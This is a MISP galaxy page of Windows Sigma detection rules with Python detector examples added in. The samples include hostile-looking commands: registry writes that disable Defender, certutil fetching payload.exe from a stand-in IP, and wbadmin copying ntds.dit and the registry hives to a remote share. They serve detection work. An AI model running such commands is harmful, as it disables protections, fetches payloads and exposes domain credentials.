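As an added example (not part of the Sigma rule or of this galaxy page), the following Python parses "reg add" command lines and reports writes that switch a Windows Defender protection feature off. The list of value names and the refinement of only reporting the disabling direction (data 1, not a "/d 0" re-enable) are this example's own assumptions; the sample command lines are constructed.

```python
import re

# Value names under the Windows Defender policy keys that switch a protection
# feature off when set to 1 (assumed list for this example; the rule itself may
# cover more or fewer names).
DEFENDER_DISABLE_VALUES = {
    "disableantispyware", "disableantivirus", "disablerealtimemonitoring",
    "disablebehaviormonitoring", "disableioavprotection",
    "disableonaccessprotection", "disablescanonrealtimeenable",
    "disablescriptscanning", "disableblockatfirstseen",
    "disableroutinelytakingaction",
}
DEFENDER_KEY_FRAGMENT = "\\microsoft\\windows defender"


def _tokens(command_line):
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def parse_reg_add(command_line):
    """Return key/value/data for a 'reg add' invocation, or None otherwise."""
    toks = _tokens(command_line)
    low = [t.lower() for t in toks]
    for i, t in enumerate(low):
        # 'add' must directly follow reg.exe (possibly path-qualified)
        if t == "add" and i > 0 and low[i - 1].rsplit("\\", 1)[-1] in ("reg", "reg.exe"):
            if i + 1 >= len(toks):
                return None

            def opt(flag):
                j = low.index(flag) if flag in low else -1
                return toks[j + 1] if 0 <= j and j + 1 < len(toks) else None

            return {"key": toks[i + 1], "value": opt("/v"), "data": opt("/d")}
    return None


def defender_tamper(command_line):
    """Return a finding when reg.exe sets a Defender Disable* value to 1."""
    p = parse_reg_add(command_line)
    if not p or not p["value"]:
        return None
    if DEFENDER_KEY_FRAGMENT not in p["key"].lower():
        return None
    value = p["value"].lower()
    if value not in DEFENDER_DISABLE_VALUES:
        return None
    # Refinement over a plain keyword match: 'reg add ... /d 0' re-enables the
    # feature, so only the disabling direction is reported.
    if (p["data"] or "").lower() not in ("1", "0x1"):
        return None
    return {"key": p["key"], "value": p["value"]}


# Constructed sample process_creation command lines (not real telemetry).
SAMPLES = [
    'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" '
    "/v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f",
    'C:\\Windows\\System32\\reg.exe add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
    "/v DisableAntiSpyware /t REG_DWORD /d 1 /f",
    'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender" '
    "/v DisableAntiSpyware /t REG_DWORD /d 0 /f",
    'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows Defender" /v DisableAntiSpyware',
]


def scan(command_lines):
    """Run the check over a batch of command lines and return the findings."""
    return [f for cl in command_lines if (f := defender_tamper(cl))]


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print("ALERT:", finding)
```

The parser deliberately requires "add" to follow reg.exe, so a "reg query" of the same key (a common support action) does not fire; whether the "/d 0" exclusion is desirable depends on whether you also want to see attackers flipping values back after the fact.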
Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet
Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Internal MISP references
UUID 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 which can be used as unique global reference for Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_zip_compress.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2021-07-20 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_zip_compress.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1074.001'] |
Potential Data Exfiltration Activity Via CommandLine Tools
Detects the use of various CLI utilities exfiltrating data via web requests
Internal MISP references
UUID 7d1aaf3d-4304-425c-b7c3-162055e0b3ab which can be used as unique global reference for Potential Data Exfiltration Activity Via CommandLine Tools in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-08-02 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_susp_data_exfiltration_via_cli.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
Detects the execution of "dctask64.exe", a binary signed by ZOHO Corporation and shipped as part of ManageEngine Endpoint Central. This binary can be abused for DLL injection and arbitrary command and process execution.
Internal MISP references
UUID 6345b048-8441-43a7-9bed-541133633d7a which can be used as unique global reference for ManageEngine Endpoint Central Dctask64.EXE Potential Abuse in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/gN3mes1s/status/1222095963789111296 - webarchive
- https://twitter.com/gN3mes1s/status/1222095371175911424 - webarchive
- https://twitter.com/gN3mes1s/status/1222088214581825540 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-01-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055.001'] |
Remote Access Tool - RURAT Execution From Unusual Location
Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files')
Internal MISP references
UUID e01fa958-6893-41d4-ae03-182477c5e77d which can be used as unique global reference for Remote Access Tool - RURAT Execution From Unusual Location in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_remote_access_tools_rurat_non_default_location.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Use of FSharp Interpreters
Detects the execution of the F# interpreters "FsiAnyCpu.exe" and "FSi.exe". Both can be used for application whitelisting (AWL) bypass and to execute F# code from script files or inline.
Internal MISP references
UUID b96b2031-7c17-4473-afe7-a30ce714db29 which can be used as unique global reference for Use of FSharp Interpreters in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/ - webarchive
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac - webarchive
- https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/ - webarchive
- https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Christopher Peacock @SecurePeacock, SCYTHE @scythe_io |
| creation_date | 2022-06-02 |
| falsepositive | ['Legitimate use by a software developer.'] |
| filename | proc_creation_win_fsi_fsharp_code_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
SQLite Chromium Profile Data DB Access
Detects usage of the "sqlite" binary to query the profile databases of Chromium-based browsers (e.g. cookies) for potential data theft.
Internal MISP references
UUID 24c77512-782b-448a-8950-eddb0785fc71 which can be used as unique global reference for SQLite Chromium Profile Data DB Access in MISP communities and other software using the MISP galaxy
External references
- https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_chromium_profile_data.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | TropChaud |
| creation_date | 2022-12-19 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sqlite_chromium_profile_data.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1539', 'attack.t1555.003', 'attack.collection', 'attack.t1005'] |
Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
Internal MISP references
UUID 9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 which can be used as unique global reference for Potentially Suspicious ASP.NET Compilation Via AspNetCompiler in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/ - webarchive
- https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_paths.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-08-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_aspnet_compiler_susp_paths.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1127'] |
HackTool - XORDump Execution
Detects suspicious use of XORDump process memory dumping utility
Internal MISP references
UUID 66e563f9-1cbd-4a22-a957-d8b7c0f44372 which can be used as unique global reference for HackTool - XORDump Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-28 |
| falsepositive | ['Another tool that uses the command line switches of XORdump'] |
| filename | proc_creation_win_hktl_xordump.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access'] |
Suspicious WebDav Client Execution Via Rundll32.EXE
Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration, of WebDAV being used to launch code hosted on a WebDAV server, or potentially a sign of exploitation of CVE-2023-23397.
Internal MISP references
UUID 982e9f2d-1a85-4d5b-aea4-31f5e97c6555 which can be used as unique global reference for Suspicious WebDav Client Execution Via Rundll32.EXE in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/aceresponder/status/1636116096506818562 - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ - webarchive
- https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/03/Figure-7-sample-webdav-process-create-event.png - webarchive
- https://www.pwndefend.com/2023/03/15/the-long-game-persistent-hash-theft/ - webarchive
- https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_susp_execution.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) |
| creation_date | 2023-03-16 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_rundll32_webdav_client_susp_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.exfiltration', 'attack.t1048.003', 'cve.2023-23397'] |
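As an added example (not the rule's own logic or code from this page), the following Python applies the parent/child/command-line condition described above to process_creation events and then goes one step further: it pulls out the WebDAV server the client is about to contact and rates a public address higher than an internal one. The argument layout (server name directly after the DavSetCookie export) is assumed from the process creation event shown in the Microsoft write-up referenced above, the "internal" ranges are an assumption (RFC 1918, loopback and link-local), and the sample events are constructed.

```python
import ipaddress
import re

DAV_MARKER = "davclnt.dll,davsetcookie"

# Address ranges treated as internal for rating purposes (assumption; extend
# with your own address plan).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
)]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _is_external(host):
    """True for an address outside INTERNAL_NETS, False inside, None for hostnames."""
    if not host:
        return None
    # WebDAV UNC notation may carry '@SSL' / '@port' suffixes; keep the host part.
    host = host.split("@", 1)[0].strip("\\")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    return not any(ip in net for net in INTERNAL_NETS)


def webdav_client_launch(event):
    """Return a finding for svchost.exe -> rundll32.exe davclnt.dll,DavSetCookie, else None."""
    if _basename(event.get("ParentImage", "")) != "svchost.exe":
        return None
    if _basename(event.get("Image", "")) != "rundll32.exe":
        return None
    cl = event.get("CommandLine", "")
    if DAV_MARKER not in cl.lower():
        return None
    # Assumed argument layout: the WebDAV server follows the export name.
    m = re.search(r"davsetcookie\s+(\S+)", cl, re.IGNORECASE)
    target = m.group(1) if m else None
    external = _is_external(target)
    return {
        "target": target,
        "external": external,
        # An internal WebDAV server is still worth a look; a public one reached
        # from a workstation is the shape of an NTLM leak to an attacker host.
        "severity": "high" if external else "medium",
    }


# Constructed sample events (not real telemetry).
SAMPLES = [
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie "
                    "203.0.113.10 http://203.0.113.10/share/x"},
    {"ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Windows\\system32\\davclnt.dll,DavSetCookie "
                    "10.0.0.5 http://10.0.0.5/dav/doc.docx"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def scan(events):
    """Evaluate a batch of events and return the findings."""
    return [f for e in events if (f := webdav_client_launch(e))]


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

Keep the parent check: the WebDAV client is driven by the WebClient service inside svchost.exe, so a rundll32.exe with the same DLL export but a different parent is a different (and rarer) situation that deserves its own triage rather than being folded into this rule.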
TrustedPath UAC Bypass Pattern
Detects indicators of a UAC bypass method that mocks a trusted directory (e.g. a "C:\Windows \System32" path with a trailing space that passes the trusted-path check of auto-elevating executables).
Internal MISP references
UUID 4ac47ed3-44c2-4b1f-9d51-bf46e8914126 which can be used as unique global reference for TrustedPath UAC Bypass Pattern in MISP communities and other software using the MISP galaxy
External references
- https://github.com/netero1010/TrustedPath-UACBypass-BOF - webarchive
- https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e - webarchive
- https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows - webarchive
- https://x.com/Wietze/status/1933495426952421843 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-08-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_uac_bypass_trustedpath.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002'] |
Renamed Msdt.EXE Execution
Detects the execution of a renamed "Msdt.exe" binary
Internal MISP references
UUID bd1c6866-65fc-44b2-be51-5588fcff82b9 which can be used as unique global reference for Renamed Msdt.EXE Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | pH-T (Nextron Systems) |
| creation_date | 2022-06-03 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_renamed_msdt.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.003'] |
HKTL - SharpSuccessor Privilege Escalation Tool Execution
Detects the execution of SharpSuccessor, a tool that exploits the BadSuccessor technique for privilege escalation in Active Directory environments with Windows Server 2025 domain controllers. Successful use of this tool can give an attacker domain admin privileges.
Internal MISP references
UUID 38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8 which can be used as unique global reference for HKTL - SharpSuccessor Privilege Escalation Tool Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel (Nextron Systems) |
| creation_date | 2025-06-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_hktl_sharpsuccessor_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.t1068'] |
Process Access via TrolleyExpress Exclusion
Detects a possible process memory dump that uses the allow-listed Citrix TrolleyExpress.exe filename as a way to dump the memory of the lsass process.
Internal MISP references
UUID 4c0aaedc-154c-4427-ada0-d80ef9c9deb6 which can be used as unique global reference for Process Access via TrolleyExpress Exclusion in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-02-10 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_citrix_trolleyexpress_procdump.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.011', 'attack.credential-access', 'attack.t1003.001'] |
Potential Product Reconnaissance Via Wmic.EXE
Detects the execution of WMIC in order to enumerate installed firewall and antivirus products.
Internal MISP references
UUID 15434e33-5027-4914-88d5-3d4145ec25a9 which can be used as unique global reference for Potential Product Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://thedfirreport.com/2023/03/06/2022-year-in-review/ - webarchive
- https://www.yeahhub.com/list-installed-programs-version-path-windows/ - webarchive
- https://learn.microsoft.com/en-us/answers/questions/253555/software-list-inventory-wmic-product - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali |
| creation_date | 2023-02-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_product.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047'] |
Suspicious Download Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files.
Internal MISP references
UUID 19b08b1c-861d-4e75-a1ef-ea0c1baf202b which can be used as unique global reference for Suspicious Download Via Certutil.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/ - webarchive
- https://forensicitguy.github.io/agenttesla-vba-certutil-download/ - webarchive
- https://twitter.com/egre55/status/1087685529016193025 - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil - webarchive
- https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-02-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_certutil_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027'] |
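As an added example (not the rule's own logic or code from this page), the following Python checks process_creation events for certutil being driven to fetch a URL. Two details matter in practice and are shown here: certutil accepts both "-" and "/" as switch prefix, so the switches are normalised before comparison, and a renamed copy is recognised through the OriginalFileName field rather than the image path. The set of download switches follows the LOLBAS entry referenced above; the sample events are constructed.

```python
import re

# certutil switches that cause it to fetch a URL (per the LOLBAS entry above)
DOWNLOAD_SWITCHES = {"urlcache", "verifyctl", "ping"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def certutil_download(event):
    """Return a finding when certutil (possibly renamed) is told to fetch a URL."""
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    if not (image.endswith("\\certutil.exe") or original == "certutil.exe"):
        return None
    toks = [t.strip("\"'") for t in event.get("CommandLine", "").split()]
    # certutil accepts both '-' and '/' as the switch prefix; normalise before comparing
    switches = {t[1:].lower() for t in toks if t[:1] in "-/" and len(t) > 1}
    urls = [t for t in toks if URL_RE.match(t)]
    hit = switches & DOWNLOAD_SWITCHES
    # a download switch without a URL (e.g. listing the URL cache) is not reported
    if not hit or not urls:
        return None
    return {
        "switches": sorted(hit),
        "url": urls[0],
        # a renamed copy (image name differs from the PE's original name) is the stronger signal
        "renamed": not image.endswith("\\certutil.exe"),
    }


# Constructed sample events (not real telemetry).
SAMPLES = [
    {"Image": "C:\\Windows\\System32\\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/payload.exe C:\\Users\\Public\\p.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil /verifyctl /f /split https://203.0.113.5/ctl.bin"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -hashfile C:\\Users\\Public\\p.exe SHA256"},
    {"Image": "C:\\Users\\Public\\cu.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "cu.exe -urlcache -f http://203.0.113.5/p.exe p.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache"},
]


def scan(events):
    """Evaluate a batch of events and return the findings."""
    return [f for e in events if (f := certutil_download(e))]


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

Requiring an actual URL on the command line keeps the hash-checking and cache-listing uses quiet, which is where most benign certutil activity lives.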
Suspicious Modification Of Scheduled Tasks
Detects modification of an already existing scheduled task (schtasks /Change) so that it runs from a suspicious location. Attackers can create an innocuous-looking task in order to avoid detection at creation time, which is where monitoring is usually focused, and then modify the task afterwards to point it at their malicious payload.
Internal MISP references
UUID 1c0e41cd-21bb-4433-9acc-4a2cd6367b9b which can be used as unique global reference for Suspicious Modification Of Scheduled Tasks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-28 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_schtasks_change.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005'] |
Sensitive File Dump Via Wbadmin.EXE
Detects the dumping of highly sensitive files such as "NTDS.DIT" and the "SECURITY" hive. Attackers can leverage the "wbadmin" utility to back up or restore such files, which may contain credentials or other sensitive information.
Internal MISP references
UUID 8b93a509-1cb8-42e1-97aa-ee24224cdc15 which can be used as unique global reference for Sensitive File Dump Via Wbadmin.EXE in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/Wbadmin/ - webarchive
- https://github.com/LOLBAS-Project/LOLBAS/blob/2cc01b01132b5c304027a658c698ae09dd6a92bf/yml/OSBinaries/Wbadmin.yml - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-backup - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-start-recovery - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113 |
| creation_date | 2024-05-10 |
| falsepositive | ['Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.'] |
| filename | proc_creation_win_wbadmin_dump_sensitive_files.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.003'] |
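As an added example (not the rule's own logic or code from this page), the following Python parses the two wbadmin forms documented in the Microsoft references above, "start backup -include:<paths>" and "start recovery -items:<paths>", and reports the ones that name a credential store. The list of sensitive files (NTDS.DIT plus the SAM, SECURITY and SYSTEM hives) is this example's assumption; the sample command lines are constructed.

```python
import re

# Files whose contents yield credentials once copied out of a backup
# (assumed list for this example).
SENSITIVE_SUFFIXES = ("\\ntds.dit", "\\config\\sam", "\\config\\security", "\\config\\system")


def _tokens(command_line):
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def wbadmin_sensitive_files(command_line):
    """Return {'action', 'paths'} when wbadmin start backup/recovery names a
    sensitive file via -include: or -items:, else None."""
    low = [t.lower() for t in _tokens(command_line)]
    if len(low) < 3 or low[0].rsplit("\\", 1)[-1] not in ("wbadmin", "wbadmin.exe"):
        return None
    if low[1] != "start" or low[2] not in ("backup", "recovery"):
        return None
    paths = []
    for t in low[3:]:
        # -include:<path>[,<path>] (backup) and -items:<path>[,<path>] (recovery);
        # split on the first ':' only so that drive letters survive
        if t.startswith(("-include:", "-items:")):
            paths.extend(p.strip() for p in t.split(":", 1)[1].split(",") if p.strip())
    hits = [p for p in paths if p.rstrip("\\").endswith(SENSITIVE_SUFFIXES)]
    return {"action": low[2], "paths": hits} if hits else None


# Constructed sample command lines (not real telemetry).
SAMPLES = [
    "wbadmin start backup -backupTarget:\\\\203.0.113.7\\share "
    "-include:C:\\Windows\\NTDS\\ntds.dit -quiet",
    "wbadmin start recovery -version:01/01/2024-00:00 -itemtype:file "
    "-items:C:\\Windows\\System32\\config\\SECURITY,C:\\Windows\\System32\\config\\SYSTEM "
    "-recoverytarget:C:\\Temp -quiet",
    "wbadmin start backup -backupTarget:E: -include:C:\\inetpub -quiet",
    "wbadmin get versions",
]


def scan(command_lines):
    """Evaluate a batch of command lines and return the findings."""
    return [f for cl in command_lines if (f := wbadmin_sensitive_files(cl))]


if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A full-volume backup ("-include:C:") also captures these files without naming them, which this check does not see; that case is better handled by the rule's own false-positive guidance of investigating backup jobs to unexpected targets case by case.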
Odbcconf.EXE Suspicious DLL Location
Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location.
Internal MISP references
UUID 6b65c28e-11f3-46cb-902a-68f2cafaf474 which can be used as unique global reference for Odbcconf.EXE Suspicious DLL Location in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html - webarchive
- https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - webarchive
- https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-22 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_odbcconf_exec_susp_locations.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1218.008'] |
Replace.exe Usage
Detects the use of Replace.exe, a built-in Windows utility that can be used to replace one file with another.
Internal MISP references
UUID 9292293b-8496-4715-9db6-37028dcda4b3 which can be used as unique global reference for Replace.exe Usage in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-03-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_replace.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Microsoft IIS Service Account Password Dumped
Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords
Internal MISP references
UUID 2d3cdeec-c0db-45b4-aa86-082f7eb75701 which can be used as unique global reference for Microsoft IIS Service Account Password Dumped in MISP communities and other software using the MISP galaxy
External references
- https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/ - webarchive
- https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html - webarchive
- https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Tim Rauch, Janantha Marasinghe, Elastic (original idea) |
| creation_date | 2022-11-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_iis_appcmd_service_account_password_dumped.yml |
| level | high |
